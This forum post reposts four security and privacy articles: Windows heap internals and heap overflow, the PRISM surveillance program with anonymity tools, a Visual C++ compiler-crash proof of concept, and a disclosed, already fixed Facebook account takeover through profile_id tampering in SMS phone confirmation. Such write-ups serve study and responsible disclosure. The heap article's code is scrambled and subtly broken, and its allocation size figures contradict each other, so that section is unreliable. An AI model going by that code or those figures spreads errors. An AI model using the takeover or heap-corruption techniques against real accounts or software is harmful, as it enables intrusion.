Nytro

[h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]ViperEye June 26, 2013 1. Introduction A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated to the heap and data is written to this memory without any bound checking being done on the data. This is can lead to overwriting some critical data structures in the heap such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we’ll see some details about the inner working of the Windows heap, then move on to discuss how heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move to understanding the vulnerability. 2. Windows Heap Basics Windows has two kinds of heap: Default heap Dynamic heap The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and local memory management functions [malloc()]. The dynamic heap is created by functions such as HeapCreate() that return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc(), HeapReAlloc(), which allocates memory from this particular heap. As we can see from the above image, PEB stores the details of the heaps initialized in the system. This can be useful in enumerating heaps in the system. The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better. [TABLE] [TR] [TD]..[/TD] [/TR] [TR] [TD]Segment List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Virtual Allocation List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Free List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]Pointer to Lookaside List[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [TR] [TD]..[/TD] [/TR] [/TABLE] The condition where the heap is not used is when the allocation chunk is greater than 512KB (4096 bytes); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let’s see how this happens: The above image shows how the heap allocation is done; certain constraints are verified before passing it forward. As we can see, all the calculation is done based on dividing by 8, the size of the allocated block is always divisible by 8, and we can also conclude from the code that there cannot exist a block of size 8 bytes because the header itself will amount to 16 bytes. Here’s the decision path during the heap allocation process: If block size is greater than 1024 bytes, go to step2. If it is less than 1024 bytes, check the lookaside list if there are no free entries check free list. If the above condition is true, then check whether the memory to be allocated is greater than 0xFE00 (512 KB). If the above condition is not true, then the memory is allocated from the free list. [*] If the above condition is true, then check whether the heap was created with a fixed size; if true, and then throw an error (STATUS_BUFFER_TOO_SMALL) 0xC0000023. If not true, use ntdll.ZwAllocateVirtualMemory to allocate new memory. Now’s let’s look at how heap memory is freed; memory is freed based on whether it is in the default heap or the dynamically allocated heap. If the buffer is in default heap then: Try to free lookaside list. Or coalesce buffer and place it on free list. If it is virtually allocated: Remove from busy list Or free it to OS. Free buffer to lookaside happens only if: There is a lookaside table Lookaside is not locked Requested size is smaller than 1024 (to fit the table) Lookaside is not “full” yet. If buffer can be placed on lookaside, keep the buffer flags set to busy and return to caller. The other option is to coalesce and place in free buffer. This happens only if the buffer can’t be freed to lookaside. The conditions where coalesce fails: Freed buffer flags & 0×80 is true Freed buffer is first ? no backward coalesce Freed buffer is last ? no forward coalesce Adjacent buffer is busy The total size of two adjacent buffers is bigger than the virtual allocate threshold (0xFE00 * 8 bytes == ~64k) Insert to free list if: Coalesced block size < 1024 insert to proper free list entry. Coalesced block size > De-commit threshold and total heap free size is over De-commit total free threshold, then De-commit buffer back to the OS. Coalesced is smaller than virtual allocate threshold, insert the block into free list [0]. Coalesced block is bigger than virtual allocate threshold, break the buffer into smaller chunks, each one as big as possible, and place them on free list [0]. Heap Overflows Let`s take a look at this rather simple example of a vulnerable function: DWORD vulner(LPVOID str) { LPVOID mem = HeapAlloc(h, 0, 128); // strcpy(mem, str); // return 0; }HANDLE h = HeapCreate(0, 0, 0); // default flags As we can see, here the vulner() function copies data from a string pointed by str to an allocated memory block pointed at by buf, without a bound check. A string larger than 127 bytes passed to it will thereby overwrite the data coincidental to this memory block (which is, actually, a header of the following memory block). The lookaside list has two pointers pointing to the lookaside entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below: So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers. Now let’s modify the above code: { HANDLE h = HeapCreate(0, 0, 0); LPVOID m1 = HeapAlloc(h, 0 , 64); LPVOID m2 = HeapAlloc(h, 0,128); HeapFree(m1); HeapFree(m2); // The above steps place the buffers in lookaside list LPVOID m1 = HeapAlloc(h, 0 , 64); // This sets up the memory for overwrite into adjacent memory blocks memcpy((char *)m, 0x31, 64+16); m2 = HeapAlloc(h, 0, 128-8); // strcpy(mem, str); // return 0; }DWORD vulner(LPVOID str) From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any memory below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move the memory back to the busy list. But, in this case, the memory of 128 bytes will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data which will overwrite the header and the FLINK, BLINK pointers of the 128 byte block. This is shown in the image below: Click to Enlarge The whole process of unlinking is shown below: Entry2?BLINK?FLINK = Entry2?FLINK Entry2?FLINK?BLINK = Entry2?BLINK So now, when the 128-byte buffer is allocated, it has already corrupted FLINK and BLINK pointers. This can be in an attacker’s control. So the entry “Entry2?BLINK?FLINK” will be in an attacker-controlled memory location; this can be overwritten with the value of Entry2?FLINK, which is also attacker-controlled. Conclusion This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited. Sursa: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained

[h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]Pierluigi Paganini June 24, 2013 [h=1]Introduction[/h] Edward Snowden is the name of a 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who worked for US Intelligence at the National Security Agency for the last four years for various defense contractors. Currently he is an employee of security defense contractors Booz Allen Hamilton. Snowden decided to reveal his identity because like other whistleblowers, such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but it was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM despite their high managements denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to user’s data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government will persecute him for disclosing Top Secret documentation on the extensive massive surveillance program PRISM. While I’m writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA Office in Hawaii, around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined but that authorities and private companies always denied. He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its “strong tradition of free speech.” According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel. “I’ve left the room maybe a total of three times during my entire stay.” “I have no intention of hiding who I am, because I know I have done nothing wrong.” “I could be rendered by the C.I.A., I could have people come after me.” “We’ve got a C.I.A. station just up the road in the consulate here in Hong Kong, and I’m sure,” “that they’re going to be very busy for the next week, and that’s a fear I’ll live under for the rest of my life,” Snowden said. The confirmation of the existence of a PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of the citizens’ privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots, and that the debated data collection has already allowed the prevention of terrorist acts. “Nobody is listening to your telephone calls. That’s not what this program is about.” “In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we’ve struck the right balance.” “You can’t have 100 percent security and also then have 100 percent privacy and zero inconvenience.” “We’re going to have to make some choices as a society. … There are trade-offs involved.” These are what the President told journalists during a visit to California’s Silicon Valley. Edward Snowden considers himself as a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas. He declared that he has carefully considered his actions and its possible consequences to the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure no people would be harmed and that the public interest would be served. “Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia.” “I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are.” “If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon.” President Obama is in the eye of the storm. He was syndicated by some members of Congress despite the revelation announced by The White House that the administration has played at least 13 briefings to Congress to show the surveillance program operated by the NSA. [h=1]The Fact – The PRISM Program[/h] The Washington Post and the Guardian were the first newspapers to publish the news of the US machine for surveillance works. The NSA and FBI systematically access user information from central servers of the leading IT. The list revealed , despite the beliefs of many security experts, that the extension of the monitoring network is larger: AOL Apple Dropbox Facebook Google PalTalk Skype Yahoo You Tube The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from IT majors and then operating complex analysis activities. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden’s presentation. They revealed that PRISM has been referred at least 1,477 times during government briefings on Homeland Security. The document states that PRISM became popular during the Arab Spring when it was used to profile individuals considered dangerous for the US. The 41 slides composing the presentation, classified as Top Secret, claim that the “collection directly from the servers” of major US IT service providers remarks the need for the information for security purpose. The Guardian has verified the authenticity of the PowerPoint presentation that is circulating on the Internet. It is classified as top secret, with no distribution to foreign allies, and was apparently used to train operatives. “Information collected under this program is among the most important and valuable foreign intelligence information we collect, and is used to protect our nation from a wide variety of threats. The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans,” Director of National Intelligence James R. Clapper said. All the companies reported in the Top Secret document denied any knowledge of the secret program, following principal comments on the disclosure: “Google cares deeply about the security of our users’ data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government ‘back door’ into our systems, but Google does not have a back door for the government to access private user data,” stated Google. “We do not provide any government organization with direct access to Facebook servers,” “When Facebook is asked for data or information about specific individuals, we carefully scrutinize any such request for compliance with all applicable laws, and provide information only to the extent required by law,” declared Joe Sullivan, Chief Security Officer for Facebook. “We have never heard of PRISM,” “We do not provide any government agency with direct access to our servers, and any government agency requesting customer data must get a court order,” said Steve Dowling, a spokesman for Apple. [h=1]Is the PRISM Program Legal? Law and Regulations[/h] The digital exposure of Internet users has reached a level unthinkable until a few years ago. This aspect has had mainly positive effects but it has also increased the surface of attack for each individual. We are all exposed to serious privacy risks, especially as legislation has struggled to keep up. The number of laws that are trying to regulate our digital existence is increasing. There is a need to reduce the gaps in legislation and enforcement that open you up to online data breaches, stalking, identity theft and disclosure of user’s personal information. It must be considered that these laws can have a major impact on our life; every ordinary operation could be started with something simple such as a phone call. Analyzing the US legal model, we can recognize the different areas in which such laws are trying to regulate technology introduction, following a short list: [h=3]Digital Life[/h] Laws and proposals are designed to protect user’s privacy in the online and mobile spheres. The Protecting Children from Internet Pornographers Act of 2011 was designed to increase the enforcement of laws related to child pornography and child sexual exploitation. The Electronic Communications Privacy Act is almost 30 years old, so it is likely going to see some major revisions to reflect the increased variety and prevalence of electronic communications. The original act was designed to help expand federal wiretapping and electronic eavesdropping provisions, as well as to protect communications that occur via wire, oral, and electronic means and to balance the right to privacy of citizens with the needs of law enforcement. The Children’s Online Privacy Protection Act or COPPA protects children under 13 from the online collection of personal information. The GPS Act is a proposal to give government agencies, commercial entities, and private citizens specific guidelines for the use of geolocation information. [h=3]Digital Commerce[/h] The massive introduction of technology in commerce has requested the definition of strict laws to avoid the abuse of information on consumer habits and activities. Following is a list of laws that seek to address a number of major issues related to consumer privacy rights: The Commercial Privacy Bill of Rights establishes a baseline code of conduct for how personal information can be used, stored, and distributed. The Application Privacy, Protection, and Security Act of 2013 was designed to address concerns with the data collection being done through applications on mobile devicesand would require that app developers provide greater transparency about their data collection practices. The Location Privacy Protection Act of 2011 addresses the risks for stalking posed by cell phones loaded with GPS and apps that gather information about a user’s location. The Cyber Intelligence Sharing and Protection Act (CISPA) is designed to allow government investigation of cyber threats sharing of Internet traffic information between the US government and IT and manufacturing companies. [h=3]Work and Employment[/h] Laws and regulation that affect users in the workplace during their ordinary activity: Social Media Privacy Act is for the protection of online privacy for job seekers. Genetic Information Nondiscrimination Act of 2008 prohibits the use of genetic information in health insurance and employment. [h=3]Personal Information[/h] No doubt, the most important set of laws and regulations are those that address issues of personal information, including medical data, private phone conversations, and video watching history. The Foreign Intelligence Surveillance Act (FISA)Amendments Act of 2008/FISA Amendments Act Reauthorization Act of 2012 passed in 1978 but has undergone some major restructuring in recent years. It proscribed basic procedures for physical and electronic surveillance and the collection of foreign intelligence information. It also provides strict judicial and congressional oversight of any covert surveillance activities. It has been modified several times; the first time under the Patriot Act expired in 2008. The U.S. Senate voted in December 2012 to extend the FISA Amendments Act through the end of 2017.Under this act, the US Government is authorized to conduct surveillance of Americans’ international communications, including phone calls, emails, and Internet records, exactly what is addressed by the PRISM program. These orders do not need to specify who is being spied on or the reasons for doing so. It is now possible for government agencies to collect information on any foreign communications, which many individuals and privacy protection groups have consistently argued is a gross violation of privacy and civil liberties. The Health Information Technology for Economic and Clinical Health (HITECH) Act requires that major security breaches be reported to Health and Human Services as well as the media. It increases enforcement of HIPAA and the resulting penalties and ensures that any individual can request a copy of his or her public health record. Most importantly, it expands HIPAA regulations to include any business associates or providers to medical facilities, requiring vendors of any kind to keep private records private. The Video Privacy Protection Act was designed to prevent the disclosure of audio/video materials, with respect to the original proposal it has been integrated with social media sites. The Protect Our Health Privacy Act of 2012 requires health providers to encrypt any mobile device containing health information, restrict business associates’ use of protected health information, improve congressional oversight of HIPAA, and provide additional measures that would protect patient privacy and safety when using health information technology. [h=3]Back to the PRISM Case[/h] After the analysis of principal laws and proposals, users can have a clearer idea on what governments are allowed to do to ensure homeland security. The US PRISM program seems to be allowed by “Section 215 of the Patriot Act, which authorizes the existence of special procedures, authorized by the FISA court to force U.S. companies to deliver assets and records of their customers, from the metadata to confidential communications, including e-email, chat, voice and video, videos and photos”. It expands the law enforcement power to spy on every US citizen, including permanent residents, without providing explanation, starting the investigation on the exercise of First Amendment rights. Those who are the subjects of the surveillance are never notified of ongoing activities. Law enforcement could keep track of every activity made by a suspect, including communication and Internet activities. Many citizens and lawyers can consider Section 215 un-constitutional, claiming that it violates the Fourth Amendment by allowing the government to effect Fourth Amendment searches without a warrant and without showing probable cause. Section 215 might be used to obtain information that affect privacy interests other than those protected by the First Amendment, but let’s think to medical records. Also the Fourth and Fifth Amendments are violated by provision of such data by failing to require that those who are the subject of Section 215 orders be told that their privacy has been compromised. [h=1]The Outsourcing of Intelligence: Risks and Benefits[/h] The recent data leak on US Top Secret program PRISM by an intelligence contractor raised a debated discussion on the introduction of outsourcing for personnel to hire for top-secret programs. It was an inevitable consequence of the growth of the security sector and of the increased number of tasks needed by governments to ensure homeland security and the security of principal productive sectors. Edward Snowden has worked at Booz Allen Hamilton and other intelligence contractors. His career started at the Central Intelligence Agency with various technical assignments. In an official statement, the company Booz Allen declared, “Booz Allen can confirm that Edward Snowden, 29, was an employee of our firm for less than 3 months, assigned to a team in Hawaii. Snowden, who had a salary at the rate of $122,000, was terminated June 10, 2013 for violations of the firm’s code of ethics and firm policy. News reports that this individual has claimed to have leaked classified information are shocking, and if accurate, this action represents a grave violation of the code of conduct and core values of our firm. We will work closely with our clients and authorities in their investigation of this matter.” Snowden is one of the thousands of private intelligence contractors hired by the US Government to respond to the increased necessity of security to prevent terrorist attacks. The majority of these professionals play critical roles within the principal security agencies in the country. They access confidential information, gather sensitive data on intelligence missions, and work side by side with civil government analysts in accessing a huge quantity of secret and top-secret documents. According to the official reveal of the Office of the Director of National Intelligence, almost one in four intelligence workers were employed by contractors, and around 70% of the intelligence community’s secret budget is spent for outsourcing. The outsourcing of intelligence activities allows better rationalization of the funds designated to ensure homeland security but it also represents a serious risk for the possibility of infiltration of spies and whistleblowers. The AP reported that nearly 500,000 contractors have access to the government’s top secret programs. “Of the 4.9 million people with clearance to access “confidential and secret” government information, 1.1 million, or 21 percent, work for outside contractors, according to a report from Clapper’s office. Of the 1.4 million who have the higher “top secret” access, 483,000, or 34 percent, work for contractors.” In 2007, the former director of Naval Intelligence, retired Rear Adm. Thomas A. Brooks, wrote in a report that contractors assumed a crucial role within the nation’s intelligence infrastructure. “The extensive use of contractor personnel to augment military intelligence operations is now an established fact of life …. It is apparent that contractors are a permanent part of the intelligence landscape,” he said. To give an idea of the number of private contractors that worked for US intelligence agencies, The Post reported that 1,931 private companies worked on reserved counterterrorism operations and many other campaigns to empower homeland. The operations were conducted all over the country in around 10,000 locations. During the last year, the principal emergency was related to the increased number of cyber attacks, both sabotage and cyber espionage campaigns, against National networks. The massive introduction of technology has made necessary the recruitment of a large number of technicians who have been entrusted with the delicate task of protecting the country’s infrastructure such as communication networks, grids, and satellite systems. A recent trend that emerged to respond to continuous cyber attacks is the involvement in offensive operations of skilled professionals and hackers hired to instruct cyber units. These same hackers have been used to perform vulnerability assessments and penetration testing on critical infrastructures. [h=1]The Risk of Cyber Attacks on the US Massive Surveillance System[/h] One of the most alarming risks related to a Top Secret program such as PRISM is represented by the possible disclosure of the information gathered. Unauthorized access to the information could give a foreign government a meaningful advantage in terms of intelligence. Foreign hackers could have access to a huge quantity of sensitive information centralized and concentrated in a single vulnerable architecture. It must be considered that a possible attack could be taken advantage of by insiders and cyber spies. The case of Bradley Manning proved to the public opinion the devastating effect that the revelation of the government’s secret documents could have on homeland security. Starting with the consideration that nearly 854,000 people ordinarily manage top-secret security clearances, it is to understand the surface of attacks for the “machine” of Intelligence. Each of these individuals could be a target for state-sponsored hackers and could itself represent an insider threat. The disclosure of the PRISM program is a demonstration that principal US intelligence agencies and law enforcement weren’t able to protect Top Secret information from disclosure. The information has been acquired by a journalist thanks to a spontaneous revelation, but it must be considered that many other Top Secret programs could be affected by cyber espionage operations by foreign governments. “The access to PRISM information could enable blackmail on a massive scale, widespread manipulation of U.S. politics, and industrial espionage against American businesses.” If persistent collectors such as the Chinese government or a hostile country like Iran or North Korea could have access to a surveillance system, it could be a tragedy for the country. Suddenly the country will have no secret for the adversary, and every sector will be deeply impacted. Foreign governments aren’t unique in their interest in access to the surveillance system. Terrorists belonging to groups like Al Qaeda and also cyber criminals could breach the defense of Intelligence archives. The development and deployment of a massive surveillance system is a critical choice. The government in fact must be sure to be able to prevent foreign intrusions and to avoid the creation of maybe a single point of failure for the overall security of the country. [h=1]Countermeasures[/h] There are various ways to limit the exposure of our digital experience to surveillance and monitoring activities. The US Government and law enforcement could have access to email accounts such as Gmail messages, spy on user communication and discover their habits. Following are a few simple suggestions to avoid monitoring: [h=3]How to anonymize the user’s Internet experience?[/h] Tor Network On the Internet, every machine is identified by its IP address that could be hidden by using anonymizing services and networks such as I2P and Tor network. Usually, the anonymizing process is based on the concept of distribution of routing information. Tor software and the Tor open network help users to avoid surveillance during web browsing, hiding IP address and other identifying information if properly configured. The anonymity is granted through the bouncing of traffic among randomly routedproxy computers before sending it on to its real destination and through the message encryption. Every node of the network manages minimal information to route the packets to the next hop without conserving history on the path. Tor is easy to use. You can download the Tor Browser Bundle, a version of the Firefox browser that automatically connects to the Tor network for anonymous web browsing. Web Proxy To anonymize a user’s identity and its IP address, it is possible to use anonymizing services. The simplest way to do it is through Web-based proxies like Proxify or Hide My Ass. Web proxies are easy to use; just typing a website URL the user could visit it anonymously. Many of them also implement advanced features to encrypt connections or block cookies and JavaScript.Principal drawback is related to data speed and difficulty to access some contents like videos. Of course be aware of the proxy you use, as you could come across honeypots set up to spy on you. VPN Virtual Private Networks represent a valid solution to anonymously surf on internet. Premium VPNs’ paid services dedicate proxy servers for their customers. All client traffic is tunneled to the VPN server via this encrypted connection and from there to the web. This results in actually using the server’s IP to browse the web, instead of the client’s. The principal question is related to the attitude of some VPN providers to maintain server logs that could reveal user’s habits. Of course principal service providers deny it but it is a concrete risk. All the above solutions slow down surfing speed due to the application of tunneling processes and the implementation of cryptographic algorithms. [h=3]Keep private your chat conversations[/h] For every communication channel, there is a more or less secure solution. The events demonstrated that most popular conventional instant messaging services like those offered by Google, Yahoo or Microsoft keep track of your conversations. A typical solution to protect the content of chat communications is to encrypt end to end the messages, an operation that could be done using a self made chat client that enciphers the content to transmit or choosing a chat extension available on the Internet. A very popular cryptographic protocol that provides strong encryption for instant messaging conversations is OTR (“off the record”). It uses a combination of the AES symmetric-key algorithm, the Diffie–Hellman key exchange, and the SHA-1 hash function to protect user privacy. Using the protocol, the server only sees the encrypted conversations, thwarting eavesdropping. Of course, to use OTR, both interlocutors must install an instant messaging software that supports it, such as Pidgin for Windows and Linux systems. [h=3]Keep private your calls[/h] Telephone conversations are exposed to government monitoring, and PRISM is just the last demonstration of the control exercised by authorities for security reasons. Since a few years ago, users were convinced that Internet-based telephony applications represented the most secure way to make calls that avoid wiretapping. Skype was considered the most secure channel since its acquisition by Microsoft. Of course, I’m speaking of a commercial product, avoiding express reference to the various crypto-mobile and applications commercialized at high cost by many security firms. Today one of the most interesting solutions provided on the market is silent Circle. It implements an “end-to-end” encryption, making it impossible for telephone companies to access the user’s call. As reported by the Washington Post: “The client software is open source, and Chris Soghoian, the chief technologist of the American Civil Liberties Union, says it has been independently audited to ensure that it doesn’t contain any “back doors.”" Another interesting software having similar functionalities and that has been independently audited to make sure there are no back doors is Redphone, an application that protects phone calls with end-to-end encryption. It has been developed with financial support from U.S. Taxpayers courtesy of the Open Technology Fund. [h=3]Protecting emails[/h] Another critical aspect is the protection of user’s mail. Commercial PGP or free GPG are considered the standard for email security, and both can be used to both encrypt and decrypt messages avoiding surveillance. GNU Privacy Guard (GnuPG or GPG) is a GPL Licensed alternative to the PGP suite of cryptographic software. GnuPG is compliant with RFC 4880, which is the current IETF standards track specification of OpenPGP. Current versions of PGP (and Veridis’ Filecrypt) are interoperable with GnuPG and other OpenPGP-compliant systems. The main problem for GPG is that novice users could find it complicated to use and not portable. I can promise that in the next few weeks, a product designed by me and my staff that makes the use of GPG on multiple platforms very easy will become available. The solution I designed is very strong and impossible to hack, and it also hides many other surprising features. [h=1]Conclusions[/h] The existence of the PRISM program doesn’t surprise security experts or the common people. From a recent survey, the majority is willing to sacrifice his privacy for homeland security. In the PRISM story, I found personally concerning the approach of the principal IT company that professed totally different privacy respect. My last thought is for surveillance operations elsewhere in the planet that is often synonymous to censorship and persecutions. The laws and regulations of many countries accept these practices to protect the interest of the oligarchy that governs the state. What will happen now that we know that the machines spying on us are also equipped with artificial intelligence and can take action against human beings? [h=1]References[/h] Edward Snowden is the responsible for disclosure of PRISM program Edward Snowden: the whistleblower behind the NSA surveillance revelations | World news | The Guardian NSA slides explain the PRISM data-collection program - The Washington Post NSA Prism program taps in to user data of Apple, Google and others | World news | The Guardian The outsourcing of U.S. intelligence raises risks among the benefits - The Washington Post http://securityaffairs.co/wordpress/13191/laws-and-regulations/the-legislation-of-privacy-new-laws-that-will-change-your-life.html InfoSec Institute Resources – Introduction to Anonymizing Networks – Tor vs I2P NSA Leak Highlights Key Role Of Private Contractors The Legislation of Privacy: New Laws That Will Change Your Life - BackgroundCheck.org Five ways to stop the NSA from spying on you Sursa: InfoSec Institute Resources – PRISM – Facts, Doubts, Laws and Loopholes

[h=2]Crashing the Visual C++ compiler[/h]In September last year I received a programming question regarding multi-level multiple same-base inheritance in C++, under one of my video tutorials on YouTube. I started playing with some tests and went a little too extreme for the likings of Microsoft 32-bit C/C++ Optimizing Compiler (aka Visual C++), which crashed while trying to compile some of the test cases. After some debugging, it turned out that it crashed on a rather nasty memory write operation, which could be potentially exploitable. Given that I was occupied with other work at the time, I decided to report it immediately to Microsoft with just a DoS proof of concept exploit. After 9 months the condition was confirmed to be exploitable and potentially useful in an attack against a build service, but was not considered a security vulnerability by Microsoft on the basis that only trusted parties should be allowed to access a build service, because such access enables one to run arbitrary code anyway (and the documentation has been updated to explicitly state this). [h=2]Heads up![/h]If you are running a build service (Team Foundation Build Service), you might be interested in the following security note in this MSDN article: Installing Team Foundation Build Service increases the attack surface of the computer. Because developers are treated as trusted entities in the build system, a malicious user could, for example, construct a build definition to run arbitrary code that is designed to take control of the server and steal data from Team Foundation Server. Customers are encouraged to follow security best practices as well as deploy defense in-depth measures to ensure that their build environment is secure. This includes developer workstations. For more information regarding security best practices, see the [URL="http://technet.microsoft.com/library/cc184906.aspx"]TechNet Article Security Guidance[/URL]. In other words (keep in mind I'm not a build service expert, but this is how I understand it): Having access to a build service is equivalent to being able to execute arbitrary code with its privileges on the build server. It is best to lock down the build service, so that a potential compromise of a developer's machine doesn't grant the attacker an instant "Administrator" on the build server. You should make sure that the machines used by the programmers are fully trusted and secure (this is an obvious weak spot). Owning one dev's machine allows rapid propagation to both the build server and other programmers' machines that use the same build service (e.g. by hijacking the build process and generating "evil" DLLs/EXEs/OBJs/LIBs instead of what really was supposed to be built), not to mention the testers machines, etc. To sum up, a vulnerability in a compiler doesn't really change the picture that much, since even without exploiting the compiler a person having access to the build service can execute arbitrary code with its privileges. [h=2]The code that crashes[/h]The C++ code snippet capable of crashing the Microsoft C/C++ Optimizing compiler is shown below, with most details included in the comments (note: this bug is scheduled to be fixed in the future): #include <stdio.h> class A { public: int alot[1024]; }; class B : public A { public: int more[1024]; }; class C : public A { public: int more[1024]; }; class DA : public B,C { public: int much[1024]; }; class DB : public B,C { public: int much[1024]; }; #define X(a) \ class a ## AA : public a ## A, a ## B { public: int a ## AA_more[1024]; }; \ class a ## AB : public a ## A, a ## B { public: int a ## AB_more[1024]; } #define Y(a) \ X(a); X(a ## A); X(a ## AA); X(a ## AAA); X(a ## AAAA); \ X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA) Y(D); Y(DAAAAAAAA); Y(DAAAAAAAAAAAAAAAA); X(DAAAAAAAAAAAAAAAAAAAAAAAA); // Funny story. Without global it doesn't compile (LNK1248). // But with global it seems to overflow, and it compiles OK. int global[0x12348]; DAAAAAAAAAAAAAAAAAAAAAAAAAA x; int main(void) { printf("%p\n", &x); printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing // DAA...AA_more to different // amount of 'A' // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01): // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler. // (compiler file 'msc1.cpp', line 1420) // To work around this problem, try simplifying or changing the program near the locations listed above. // Please choose the Technical Support command on the Visual C++ // Help menu, or open the Technical Support help file for more information // Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later. // // (2154.dd4): Access violation - code c0000005 (first chance) // First chance exceptions are reported before any exception handling. // This exception may be expected and handled. // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0 // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0 nv up ei pl nz na pe cy // cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207 // MSVCR100!_VEC_memcpy+0x5a: // 73170bb7 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=???????????????????????????????? // return 0; } As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know! [h=2]Vendor communication timeline[/h]2012-09-30: Report sent to Microsoft (DoS only PoC). 2012-10-01: Received ACK + request for further clarification. 2012-10-03: Received information that the crash appears to be exploitable. 2012-10-03: Sent clarification. 2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue. 2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug. 2012-11-06: Received ACK + information that the bug will be discussed again with the product team. 2012-12-18: Received "we are still working on it". 2013-01-31: Sent a ping. 2013-06-03: Sent a ping. 2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note. 2013-06-21: Sent a heads up with this blog post. 2013-06-24: Published this blog post. [h=2]Update[/h]A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers Sursa: gynvael.coldwind//vx.log

[h=2]Hijacking a Facebook Account with SMS[/h] This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy. Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address. The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target’s doesn’t trigger an error. To exploit this bug, we first send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified. Note: You may have to reauth after submitting the request, but the password required is yours, not the targets. An SMS is then received with confirmation. Now we can initate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we’re done. The account is ours. [h=4]Fix[/h] Facebook responded by no longer accepting the profile_id parameter from the user. [h=4]Timeline[/h] 23rd May 2013 - Reported 28th May 2013 - Acknowledgment of Report 28th May 2013 - Issue Fixed [h=4]Note[/h] The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue. Sursa: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms

